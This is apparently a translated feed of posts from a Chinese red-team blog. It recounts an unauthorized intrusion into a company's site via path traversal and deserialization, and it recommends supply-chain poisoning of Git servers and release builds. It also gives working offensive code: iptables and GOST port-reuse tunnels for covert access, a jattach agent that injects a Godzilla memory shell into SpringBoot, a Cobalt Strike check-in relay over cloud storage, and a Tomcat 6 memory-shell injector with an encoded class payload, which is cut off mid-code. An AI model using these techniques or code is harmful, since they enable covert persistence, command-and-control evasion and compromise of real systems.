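    if os.path.commonpath([full, UPLOAD_DIR]) != UPLOAD_DIR:
        raise ValueError("path traversal attempt: %r" % tmp_name)
    return full
```

With the unsafe version, a tmp_name of "../../admin/saas.txt" resolves outside the attachment directory — exactly the primitive used here to exfiltrate the license file.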
Genius among geniuses, as expected of me.
Local test: success. Remote test: success.
[image: index-18_1.png]
saas.txt retrieved — every puzzle piece collected.
Now just wait for the dead of night, smack the site once through csv_import, and happily romp through the intranet.
To avoid detection, I started cleaning up — deleted the post and walked away. Success or failure would come at midnight.
And then... there was no then.
[image: index-18_2.png]
Back that evening, I found I couldn't even log in anymore...
You genius, you absolute clown — a pure, distilled idiot among idiots, aaaaargh.
The idiot, it turns out, was me.
While basking in the glory of having retrieved saas.txt, I had carelessly deleted the post.
What I hadn't realized: deleting a post deletes its attachments — and since the post's attachment had been successfully redirected to saas.txt, deleting the attachment deleted saas.txt with it.
And so the site blew up, and a week and a half of digging — on a site where I had actually found the bugs —
was destroyed by my own hand.
A comment from 2024
This happened long, long ago — I was still too green then. Back then I only knew half of supply-chain attacks, not the other half, and I ground away far too hard in territory I wasn't good at (code auditing).
The test-site angle deserved follow-through: instead of staring at the source, I should have taken the Git server and quietly poisoned it, or poisoned a released build — with encrypted-source products, poisoning a release is the most convenient route and basically undetectable. I was probably very close to that Git.
Whatever — it was just a target for idle fun anyway. Back to work.
]]>
14 https://9bie.org/index.php/archives/982/#comments https://9bie.org/index.php/feed/archives/982/
HELLO-2024 — Mon, 19 Feb 2024, https://9bie.org/index.php/archives/981/

Recent status
It's been more than half a year since my last post. The blog was growing grass, and since it's the new year, here's a post to prove I'm still alive.
Personally I only count the lunar new year as the real new year, and over the holidays I did nothing but laze around at home, hence posting only now.
A lot happened this year — I hacked several behemoths I couldn't even have imagined before. Good fun. The downside is I can no longer play the outlaw and publish the process like before; this time it really would be incriminating.
With all my energy going into work, there was no time to fool around with cases worth writing up, and the trivial ones aren't worth posting, so the blog sat idle.
Goal for 2024: a few more postable cases.
Life
Over a year in Guangzhou now. My impression in one line: so many people, all people, nothing but damn people.
And the roads here are built narrow; some places don't even have bike lanes, so wherever you walk you get buzzed by e-bikes from every angle — thrilling, and terrifying.
Guangzhou's traffic is, in my view, beyond saving: apart from the metro and e-bikes, every mode of transport is basically paralyzed. Last time a 3 km trip took an hour by car, believe it or not.
That said, there's a lot of food in Guangzhou. Not quite my taste, but eating is undeniably convenient (x
Still, only after leaving did I realize home was actually pretty good — back for the holidays, I felt g-force on a bus again for the first time in ages.
This year I also went to Beijing twice and Shenzhen twice. Beijing — for the reasons everyone knows, no comment. Shenzhen is a different animal from Guangzhou: that's what a real first-tier city feels like.
一年多不对,两年了,没有排练,没有琴房,没有试唱练耳,甚至没有勾八和声作业,没有每天的a→a↗a↑a↘a↓。不知不觉原本作为每天的日常行为已经完全消失了。现在手上反而特别怀念之前这些。
之前上学音乐为专业的时候天天玩电脑,自己本专业碰都不想碰。现在上班了反而反过来了,天天碰电脑,下班了脑袋里却一直想着音le的事。果然,消灭一个爱好最好的方式就是把它变成上班hh
不过不怎么意外的是,成功在2023学到了一门新技能,那就是弹guitar。虽然很早就开始自己慢慢摸了,大概应该是2021年9月份时候?不过那时候还在学校and被拉去苦逼山里当老师(真-公立校的老师),当了一个学期,然后回来就是直接毕业寄导致2021-2022基本都是没怎么练琴的状态。
哇刚学的时候那是真的好痛苦,看着视频里大佬们看的非常羡慕,然后再看看现实里自己的菜逼技术那是真的非常折磨,恨不得下一秒自己就变的那么强。真正有突飞猛进的进步还是在2023年,不是说弹的多好,至少算是入门等级了吧。至少证明了坚持的重要性。
今天同时还下单了个midi键盘,现在前置技能树基本快点齐了,(和声√ 钢琴√ 架子鼓x bass√ 吉他√ 人声x)看看能不能在2024年写出一个自己的作品出来,之前都是小打小闹,只能算demo,看看今年成果吧
技术
Technique
What to say about technique — it's merged into daily life, and nothing about it is quantifiable, so I can't really judge the improvement.
In the abstract: I can't hit whatever I point at 100% of the time, but I have the confidence to take a swing at anything. Pentesting is like the old three-character mantra: exploit every gap, manufacture every opportunity.
Once the opportunity is found, the rest is fundamentals and detail. I won't dwell on evasion — that basically counts as fundamentals now; post-exploitation, endpoint evasion, all of it hinges on one premise: you can land the hit.
But in 2024, initial access increasingly comes down to two things: the arsenal — your vulnerability stockpile — and social engineering. Conventional bugs are rarer and rarer, especially against targets with any security maturity: mostly there are none, and even when one exists, it's captured by the appliances in an instant, alarms fire at light speed, game over.
So now it's mostly stockpile — 0-days, or digging on the spot. But those feel like doomsday weapons only. Why? Because a bug basically fires once; after that it's patched. The thing you sweated over for ages is spent the moment you use it.
Then there's social engineering. Usually people only mean phishing — very effective, extremely effective — but sadly I just can't learn it; I'm tongue-tied TAT. I open with resume.exe and get cursed out so thoroughly it feels like I'm being paid emotional damages, not salary. But phishing is only a small slice of social engineering; the real bulk lies elsewhere — more on that in a moment.
My conclusion from all this offense-defense: big brother is the final winner of this version. Two years in, I feel it ever more strongly: vulnerabilities only dwindle with use, but resources only compound with use.
** uses whatever means to take A, then uses A's "resources" (which cover a lot — not just data, but channels, even legitimate business) to take B; then C, untakeable before, falls to A's and B's resources combined; and so on — interest on interest on interest, the snowball grows, the hand of cards gets ever larger.
Whereas we conventional red-teamers start by farming conventional findings; when those run dry we burn stockpile; when stockpile runs dry we burn 0-days. Each engagement plays a card from our hand, and then the backend/lab big brothers toil to deal us new ones (finding vulnerabilities). Net result: our hand only shrinks.
Not to mention ** isn't limited to social-engineering tactics — they can use delivery/push tactics too, and at crucial moments combine them with exploits. Nearly unstoppable.
Part of me wants to join them, but there are basically only two routes: going out there, or getting recruited — the former too bitter, and for the latter nobody wants me. Well, enough rambling; for now this has nothing to do with me, and I'll just stay a law-abiding citizen.
So on the technique front there's little to say: drill the fundamentals, raise baseline competence (basic programming, evasion, post-exploitation), and meanwhile start stockpiling — vulnerabilities, source code, data, even channels. On the cyber battlefield to come, all of it will be used.
Closing
That's all I wanted to say. See you in 2024.
]]>
2 https://9bie.org/index.php/archives/981/#comments https://9bie.org/index.php/feed/archives/981/
写了篇不太好发出来的 (Wrote Something Not Quite Publishable) — Fri, 16 Jun 2023, https://9bie.org/index.php/archives/979/

A bit incriminating — ask me for the password directly if you want to read it.
不同中间件端口复用代理解决方案 (Port-Reuse Proxy Solutions Across Middlewares) — Tue, 28 Feb 2023, https://9bie.org/index.php/archives/969/

Preface
frp reverse tunnels are great, but half the time the damn server has no outbound access, or the traffic appliances flag it in no time.
On Linux, iptables can do port reuse; on Windows there's no good option.
Unless you pay Microsoft a pile of money to get a driver signed and do port reuse in a driver — let's set that tycoon route aside.
Another option is something like Neo — works fine, but is there anything faster?
Say... WebSocket? A direct long-lived connection? Approaching raw-TCP efficiency?
No more talk — let's build it!
iptables port reuse
A quick aside on iptables port reuse:
if we hit any port on the target and can see our source IP in netstat -anpt, we can key a port forward off that IP with iptables:
iptables -t nat -A PREROUTING -p tcp -s <our IP> --dport <target web port> -j REDIRECT --to-port <forward port>
GOST
I was going to write it myself, but thought better of reinventing the wheel; a quick GitHub search happily turned up this tool.
Project: GOST
Our goal is simple: listen with a WebSocket proxy, relay it through whatever middleware, then chain a local proxy onto it.
GOST's features fit exactly. On the remote server, run:
gost -L ws://:7000
Configure the middleware (below), then locally use:
gost -L=:8080 -F=ws://<remote web host>:<remote web port>
and we have a long-lived, WebSocket-based, port-reusing proxy riding the web port.
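What gost does for us can be reduced to plain byte-pumping between two sockets. A minimal sketch of that relay principle (no WebSocket framing, no gost internals — just the forwarding loop; all names are mine):

```python
import socket
import threading


def _pump(src, dst):
    # Copy bytes one way until the source side closes.
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def serve_relay(listen_port, target_host, target_port, ready=None):
    """Accept local clients and splice each onto a fresh upstream connection."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", listen_port))
    srv.listen(5)
    if ready is not None:
        ready.set()
    while True:
        client, _ = srv.accept()
        upstream = socket.create_connection((target_host, target_port))
        threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
        threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()
```

In the real setup the "upstream" leg is a WebSocket stream multiplexed through the middleware, but the per-connection splice is the same.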
Nginx middleware configuration
Nginx is simple — a single proxy pass will do:
location /ws {
    proxy_redirect off;
    proxy_pass http://<ws listen ip>:<local ws listen port>;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Host $http_host;
    proxy_read_timeout 300s;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
Nginx has one advantage: hot reload. A single nginx -s reload and at least you won't blow up the existing business.
Apache
Apache needs rather more changes: the config file must pull in extra modules. The one consolation is that the modules ship with Apache.
Enable the modules either with the command:
sudo a2enmod proxy proxy_http proxy_ajp proxy_balancer proxy_wstunnel
or add them directly in your conf (all of the above):
LoadModule proxy_module /usr/lib/apache2/modules/mod_proxy.so # absolute path to the Apache module
....
Then add:
ProxyPass /ws ws://127.0.0.1:7000/ws
and finish with service apache2 reload.
IIS
Windows is different: you can click through the GUI, or use the command line — ah, but I don't know the command-line way .jpg
It should be doable with PowerShell, but Windows is genuinely annoying here because two modules must be installed by hand; they don't ship with IIS.
So for IIS I'd still recommend Neo or an IIS-module backdoor — unless you think the admins are truly hopeless.
First enable WebSocket: open Control Panel → Turn Windows features on or off,
[image: 1.jpg]
and tick WebSocket Protocol.
[image: 2.jpg]
Next install ARR and URL Rewrite:
Install ARR: application-request-routing
Install URL Rewrite: url-rewrite
Then configure ARR:
[image: 3.jpg]
[image: 4.jpg]
[image: 5.jpg]
Just click Enable.
Then configure a URL forward: find your site and open URL Rewrite.
[image: 6.jpg]
No wildcards needed — an exact match on GOST's /ws path is enough.
[image: 7.jpg]
Other middlewares
Same principle everywhere: configure a WebSocket forward — more or less identical.
Going further
All the ws above should be swappable for mws — I see gost supports multiplexing. No idea how big the real-world gain is, but it sounds impressive, so let's assume it is.
Also, plain ws traffic is unencrypted; consider upgrading to wss — though that drags in plenty of hassle, most typically certificates, certificates, certificates.
Finally, gost's default ws listen path should be changed too — its traffic signature is far too loud. Handle these yourself afterwards to avoid detection in real engagements.
SpringBoot获取Context的一些方法 && agent外部注入哥斯拉内存马 (Some Ways to Get the SpringBoot Context && Injecting a Godzilla Memory Shell via an External Agent) — Fri, 24 Feb 2023, https://9bie.org/index.php/archives/967/

Preface
Memory shells are refined and civilized; on-disk shells are crude, little-brother stuff.
So nowadays, when we can plant a memory shell, we generally do. But sometimes we take a SpringBoot host through some channel other than web code execution.
Then, wanting a backdoor: a conventional bind shell is unreachable because the target usually sits on an intranet; a reverse shell is too noisy in traffic; both may leave files on disk; port reuse needs root and has a chance of blowing things up. Highly hearse-prone. So the best bet is a memory shell in SpringBoot — no file touches disk, and a forward connection keeps it stealthy.
The goal of planting a memory shell is simple: execute our Java code inside the process, then register it on a route.
Approaches to planting the shell
How to execute arbitrary code in the process? The easiest way is injection — and since Java is a VM, it very considerately provides a set of native APIs for us. Recommended tool: jattach.
Roughly, it injects into the process and kindly calls the Java native attach API for us, loading our agent.
Usage: jattach.exe pid load instrument false '<agent path>'
So our first goal is to build an agent.
Building the agent
Treat the agent as a DLL with special entry points — the premain, agentmain, etc. functions. These are documented to death online, so no need to repeat that here; we go straight to agentmain, which the VM calls after it finishes loading.
At the same time, we edit META-INF/MANIFEST.MF and add an Agent-Class pointing at our entry-point class.
The full template:
// META-INF/MANIFEST.MF
Manifest-Version: 1.0
Created-By: 18.0.1 (Oracle Corporation)
Premain-Class: com.bie.agent
Agent-Class: com.bie.agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true
package com.bie;
public class agent {
public static void agentmain(String agentOps, Instrumentation inst) throws UnmodifiableClassException, IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
}
}
Next we add the code-execution part. Memory shells are normally loaded with Thread.currentThread().getContextClassLoader(); that works inside a web request, but not here.
When running inside a web request, the current Thread already carries the context and environment needed to add our shell to the route manager later — in Tomcat and SpringBoot those threads are usually named xxx-exec-N. We, however, were injected, and our thread has none of that information, so we take a detour.
If this thread doesn't have it, just enumerate them all. Java's try is wonderfully forgiving anyway: if it works, it works; if not, the try catches it and nothing explodes.
So the code can be written like this:
Method m = Thread.class.getDeclaredMethod("getThreads");
m.setAccessible(true);
Thread[] threads = (Thread[])((Thread[])m.invoke((Object)null));
for(int i = 0;i<threads.length;i++){
    try {
        byte[] var2 = (new BASE64Decoder()).decodeBuffer("<your memory-shell base64>");
        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass",String.class,byte[].class,int.class,int.class);
        defineClass.setAccessible(true);
        Class Evil = (Class) defineClass.invoke(threads[i].getContextClassLoader(), "EvilGodlliza", var2, 0, var2.length);
        Constructor constructor = Evil.getDeclaredConstructor( int.class); // must match the constructor's signature; our Evil takes a single int, so int it is
        constructor.setAccessible(true);
        constructor.newInstance(111);
    } catch (Exception var4) {
        var4.printStackTrace(ps);
    }
}
Brute-force-load through every thread in a loop — as long as it's in memory somewhere, one of them will work.
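That enumerate-and-brute-force pattern — try every candidate, swallow failures, keep the first success — is worth naming on its own. A generic sketch (pure illustration, not tied to any JVM API; the names are mine):

```python
def first_success(candidates, action):
    """Apply action to each candidate and return the first result that
    doesn't raise. Mirrors looping over every thread's class loader and
    letting try/catch absorb the ones that can't define the class."""
    failures = []
    for candidate in candidates:
        try:
            return action(candidate)
        except Exception as exc:  # deliberately broad, like the Java catch
            failures.append(exc)
    raise RuntimeError("all %d candidates failed" % len(failures))
```

The design trade-off is the same as in the Java loop: you pay for noisy repeated failures, but you never need to know in advance which thread carries the right context.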
The memory-shell part
Long story short: the shell itself — see my earlier post "SpringBoot 内存马 && SPEL注入内存马" for details.
The only difference is carving Godzilla out of its JSP form: swap the JSP request/response/session for SpringBoot's — trivial stuff. The real work is obtaining the Context, since different versions obtain it differently. So I collected several direct ways to get the Context:
org.springframework.web.context.WebApplicationContext context = null;
try{
java.lang.reflect.Field filed = Class.forName("org.springframework.context.support.LiveBeansView").getDeclaredField("applicationContexts");
filed.setAccessible(true);
context =(org.springframework.web.context.WebApplicationContext) ((java.util.LinkedHashSet)filed.get(null)).iterator().next();
}catch (Exception exx){
exx.printStackTrace(ps);
}
if (context == null){
try {
context = (ServletWebServerApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
}catch (Exception exx){
exx.printStackTrace(ps);
}
}
if (context == null){
try {
context = WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());
}catch (Exception exx){
exx.printStackTrace(ps);
}
}
if (context == null){
try {
context = ContextLoader.getCurrentWebApplicationContext();
}catch (Exception exx){
exx.printStackTrace(ps);
}
}
if (context == null){
try {
context = RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());
}catch (Exception exx){
exx.printStackTrace(ps);
}
}
Drop it in and it works. Then register the route the regular way:
RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
field.setAccessible(true);
java.util.ArrayList<Object> adaptedInterceptors = (java.util.ArrayList<Object>) field.get(requestMappingHandlerMapping);
EvilGodlliza vulInterceptor = new EvilGodlliza( 0);
adaptedInterceptors.add(vulInterceptor);
out.write("ojbk");
out.close();
合起来大概就能用了
Another idea
Inside an agent we aren't limited to this approach — there's also the JVM instrumentation API route: modify the loaded bytecode directly. It's too late tonight; I'll write that tomorrow. Coo coo coo (procrastinating).
年末总结-2022印象最深的一件事 (Year-End Summary: The Most Memorable Thing of 2022) — Fri, 06 Jan 2023, https://9bie.org/index.php/archives/966/

Preface
No preface. It's been ages since my last post, so first, what I've been up to lately — the most memorable thing of 2022, I'd say.
At the end of the year, bored, I fancied a casual hack. This enterprise was a tough one — a dedicated team of some size maintains it.
Then the following happened:
Got initial access into a side system; obtained some account data.
Logged into this engagement's actual target → couldn't kill it.
Scoured the internet for sites on the same codebase → killed one.
The source is damn encrypted — sg11, 500 MB of files, undecryptable.
Started working the vendor.
Applied for a trial; got a test instance with an admin backend.
Black-boxed the vendor's test site to death — its source wasn't encrypted, so no need to hit the vendor further.
Started auditing: their license file is a PHP file outside the webroot, loaded with include.
Audited my way to a deserialization bug — turned out to be an n-day.
Fired phpggc straight at GuzzleHttp: the arbitrary-code-execution chain was patched, wouldn't run.
But the Guzzle file-write chain wasn't — arbitrary file write achieved.
Tried writing into the webroot: failed, no permission.
Pivot: either dig a SQL injection to log in as admin and reuse the test-site kill, or find an arbitrary file read to recover the original license file, then kill it with the arbitrary write.
Started hunting for an arbitrary file read.
The code is written pretty safely; even the file uploads are filtered.
But in a weekly-report-like form, an AJAX call to upload.php returns JSON containing a tmp filename —
and where the report consumes it, that tmp filename is unfiltered, giving directory traversal.
Publish a post, and its uploaded attachment becomes whatever file the traversal points at.
Used the traversal to download the license file.
Then it was just a matter of waiting for the right moment to write the backdoored license via the deserialization file-write, and the site would be dead.
That was the mental journey of testing the PoC.
Then I deleted the published post.
Then the site exploded.
Fallen on the eve of dawn.
The reason: the post soft-links its attachment... I had pointed it at the license file, and when I deleted the report, the damn thing deleted the attachment with it — license file included.
And so it was officially declared: the site I had supply-chained at for ages, dug at for a week and a half, and actually found working bugs in —
was destroyed by my own hand. Aaaaargh.
COVID really does lower your IQ. I didn't believe it before; I do now.
Aaaaargh.
Summary
Graduated; became a wage slave. That's it.
Fewer words every year.
2023 goal: stay alive.
oss-stinger/腾讯云OSS上线工具 (oss-stinger: a Tencent Cloud OSS Check-in Tool) — Sat, 26 Nov 2022, https://9bie.org/index.php/archives/961/

Preface
Project: 9bie/oss-stinger
We already have cloud functions and domain fronting for check-ins, so naturally OSS check-in is next. In practice the advantage isn't as big as imagined — maybe the only upside is easy deployment?
The principle is a simple HTTP relay: run a local HTTP listener and point the CS check-in address at it. On the other end, a fetcher on the server downloads the client's HTTP requests from OSS, forwards them to the CS team server, takes the CS server's responses, pushes them back through OSS to the client — which hands them to the CS beacon. Done.
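The round trip can be sketched with two one-way channels standing in for two bucket objects — an in-memory model only (FakeBucket is a class I made up; the real tool talks to the Tencent Cloud object-storage API):

```python
import queue
import threading


class FakeBucket:
    """Stand-in for the OSS bucket: two named objects used as one-way channels."""

    def __init__(self):
        self._chan = {"c2s": queue.Queue(), "s2c": queue.Queue()}

    def put(self, name, data):
        self._chan[name].put(data)                    # "upload" an object

    def get(self, name, timeout=5):
        return self._chan[name].get(timeout=timeout)  # "poll and download"


def client_relay(bucket, beacon_request):
    bucket.put("c2s", beacon_request)                 # beacon -> local relay -> bucket
    return bucket.get("s2c")                          # bucket -> local relay -> beacon


def server_relay(bucket, forward_to_cs):
    request = bucket.get("c2s")                       # server relay polls the bucket
    bucket.put("s2c", forward_to_cs(request))         # CS reply goes back up
```

Both sides only ever talk to the bucket, which is why the beacon host never needs a direct line to the team server.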
Usage
.\oss-stinger.exe
  -address string
        listen address or target address, e.g. 127.0.0.1:8080
  -id string
        your Tencent Cloud SecretID
  -key string
        your Tencent Cloud SecretKey
  -mode string
        client/server, pick one
  -url string
        the URL of your Tencent Cloud OSS bucket
First create an HTTP listener in CS with all hosts set to 127.0.0.1, then generate the payload.
[image: 1.jpg]
Then change the Host back to the public IP (this step matters).
Next go to Tencent Cloud and create an OSS bucket; grab its URL.
[image: 2.jpg]
Then fetch your SecretKey and SecretID from https://console.cloud.tencent.com/cam/capi.
Now we can use the tool. Start a relay on the victim machine:
oss-stinger.exe -mode client -url <OSS bucket URL> -address 127.0.0.1:<port> -id <Tencent Cloud SecretID> -key <Tencent Cloud SecretKey>
Then on the server run:
oss-stinger.exe -mode server -url <OSS bucket URL> -address 127.0.0.1:<port> -id <Tencent Cloud SecretID> -key <Tencent Cloud SecretKey>
Double-click the payload on the victim machine, and it checks in.
[image: 3.jpg]
Tomcat6 注入内存马 (Injecting a Memory Shell into Tomcat 6) — Fri, 04 Nov 2022, https://9bie.org/index.php/archives/960/

Preface
Learning new tricks from the big brothers — I feel I've become an IDEA attachment. The brothers here speak so nicely; I love this place .jpg
Below is the list of referenced (plagiarized) articles.
How to put it — after a few weeks of Java I've got a feel for it: planting a memory shell is just like pointer-chasing in Win32.
First solve where to plant it — obtain the context, the standardContext: walk the stack to find its address... no wait, in Java that's called an object.
Then derive from that object to the lists that manage filters. A normal request first walks a filter list: on a match it's handed to the filter, and after the filters it's passed down to the servlets/controllers. Our job is to find that filter list's address and wedge our shell into it.
How do we add it? Find the registration functions first and register our shell as a filter — derived from the stack again, still an addressing problem. Overall Java is much the same; it's comprehensible.
Of course, understanding is one thing; asking me to write a complete project is quite another .jpg
线程加载问题
加载Filter Class的时候,不能用系统ClassLoader,得用当前线程的Loader,不然会报找不到org.servlet.Filter
Method defineClass =
ClassLoader.class.getDeclaredMethod("defineClass",byte[].class,int.class,int.class);defineClass.setAccessible(true);
byte[] code = {};
Class filter = (Class)defineClass.invoke(Thread.currentThread().getContextClassLoader(),code,0,code.length);
Object testFilter = filter.newInstance();
Use Thread.currentThread().getContextClassLoader(), not ClassLoader.getSystemClassLoader() — damn thing cost me a whole day.
Still the thread-loading problem
If the injection point can't reach the right thread, or things were created by another thread — for example, loading a class in a Tomcat Servlet with ClassLoader.getSystemClassLoader() (yes, that's exactly what I did) — consider reflection:
Class<?> FilterDefClass =
Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.deploy.FilterDef");
Object filterDef = FilterDefClass.newInstance();
Force-loading this way doesn't help much on its own... but I was stuck on the thread issue for so long that I converted every unloadable reference to this form.
The complete code
The workflow: copy-paste from everywhere — lift the Tomcat 6/7/8 parts from "利用shiro反序列化注入冰蝎内存马", lift the injection flow from "tomcat6、7、8、9内存马", stitch them together, done.
First package the Filter code as a class:
package com;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import javax.servlet.*;
public class testFilter implements Filter{
public testFilter() {
}
@Override
public void init(FilterConfig filterConfig) throws ServletException {
}
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws ServletException, IOException {
if (servletRequest.getParameter("cmd") != null){
servletResponse.getWriter().write("Inject OK!");
}
filterChain.doFilter(servletRequest,servletResponse);
}
@Override
public void destroy() {
}
}
Then compile the injector:
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Properties;
public class TomcatMemShellInject {
String uri;
String serverName;
Object standardContext;
public static byte[] base64Decode(String str) throws Exception {
Class clazz;
try {
clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception var3) {
clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke((Object) null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
private final static String filterName = "TomcatMemShellInject";
public byte[] getContent(String filePath) throws IOException {
File file = new File(filePath);
long fileSize = file.length();
if (fileSize > Integer.MAX_VALUE) {
System.out.println("file too big...");
return null;
}
FileInputStream fi = new FileInputStream(file);
byte[] buffer = new byte[(int) fileSize];
int offset = 0;
int numRead = 0;
while (offset < buffer.length
&& (numRead = fi.read(buffer, offset, buffer.length - offset)) >= 0) {
offset += numRead;
}
// make sure every byte was read
if (offset != buffer.length) {
throw new IOException("Could not completely read file "
+ file.getName());
}
fi.close();
return buffer;
}
public TomcatMemShellInject() throws NoSuchFieldException, IllegalAccessException, NoSuchMethodException, InvocationTargetException, InstantiationException, ClassNotFoundException, IOException {
Tomcat678();
try {
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
String result = "yv66vgAAADIATAoADAAoCQApACoIABsKACsALAgALQsALgAvCwAwADEIADIKADMANAsANQA2BwA3BwA4BwA5AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABBMY29tL3Rlc3RGaWx0ZXI7AQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7AQAKRXhjZXB0aW9ucwcAOgEACGRvRmlsdGVyAQBbKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjspVgEADnNlcnZsZXRSZXF1ZXN0AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAPc2VydmxldFJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEAC2ZpbHRlckNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47AQANU3RhY2tNYXBUYWJsZQcAOwEAB2Rlc3Ryb3kBAApTb3VyY2VGaWxlAQAkdGVzdEZpbHRlci5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAOAA8HADwMAD0APgcAPwwAQABBAQADY21kBwBCDABDAEQHAEUMAEYARwEACkluamVjdCBPSyEHAEgMAEkAQQcASgwAGwBLAQAOY29tL3Rlc3RGaWx0ZXIBABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YXgvc2VydmxldC9GaWx0ZXIBAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAcamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdAEADGdldFBhcmFtZXRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAE2phdmEvaW8vUHJpbnRXcml0ZXIBAAV3cml0ZQEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BAEAoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOylWACEACwAMAAEADQAAAAQAAQAOAA8AAQAQAAAAMwABAAEAAAAFKrcAAbEAAAACABEAAAAKAAIAAAAJAAQACgASAAAADAABAAAABQATABQAAAABABUAFgACABAAAAA1AAAAAgAAAAGxAAAAAgARAAAABgABAAAADwASAAAAFgACAAAAAQATABQAAAAAAAEAFwAYAAEAGQAAAAQAAQAaAAEAGwAcAAIAEAAAAI0AAwAEAAAAKLIAAhIDtgAEKxIFuQAGAgDGAA8suQAHAQASCLYACbEtKyy5AAoDALEAAAADABEAAAAaAAYAAAATAAgAFAATABUAHgAWAB8AGAAnABkAEgAAACoABAAAACgAEwAUAAAAAAAoAB0AHgABAAAAKAAfACAAAgAAACgAIQAiAAMAIwAAAAMAAR8AGQAAAAYAAgAaACQAAQAlAA8
AAQAQAAAAKwAAAAEAAAABsQAAAAIAEQAAAAYAAQAAABwAEgAAAAwAAQAAAAEAEwAUAAAAAQAmAAAAAgAn";
byte[] code = base64Decode(result);
Class filter = (Class) defineClass.invoke(Thread.currentThread().getContextClassLoader(), code, 0, code.length);
Object testFilter = filter.newInstance();
Class<?> FilterDefClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.deploy.FilterDef");
Object filterDef = FilterDefClass.newInstance();
FilterDefClass.getMethod("setFilterName", String.class).invoke(filterDef, filterName);
Method addFilterDef = standardContext.getClass().getMethod("addFilterDef", FilterDefClass);
addFilterDef.invoke(standardContext, filterDef);
filterDef.getClass().getMethod("setFilterClass", String.class).invoke(filterDef, testFilter.getClass().getName());
Class<?> FilterMapClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.deploy.FilterMap");
Object filterMap = FilterMapClass.getConstructor(new Class[]{}).newInstance();
String setFilterName = (String) FilterDefClass.getMethod("getFilterName").invoke(filterDef);
FilterMapClass.getMethod("setFilterName", String.class).invoke(filterMap, setFilterName);
FilterMapClass.getMethod("setDispatcher", String.class).invoke(filterMap, "REQUEST");
FilterMapClass.getMethod("addURLPattern", String.class).invoke(filterMap, "/*");
Method addFilterMap = standardContext.getClass().getDeclaredMethod("addFilterMap", FilterMapClass);
addFilterMap.invoke(standardContext, filterMap);
Object tmpFilterDef = FilterDefClass.newInstance();
FilterDefClass.getMethod("setFilterClass", String.class).invoke(tmpFilterDef, "org.apache.catalina.ssi.SSIFilter");
FilterDefClass.getMethod("setFilterName", String.class).invoke(tmpFilterDef, filterName);
Class<?> ContextClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.Context");
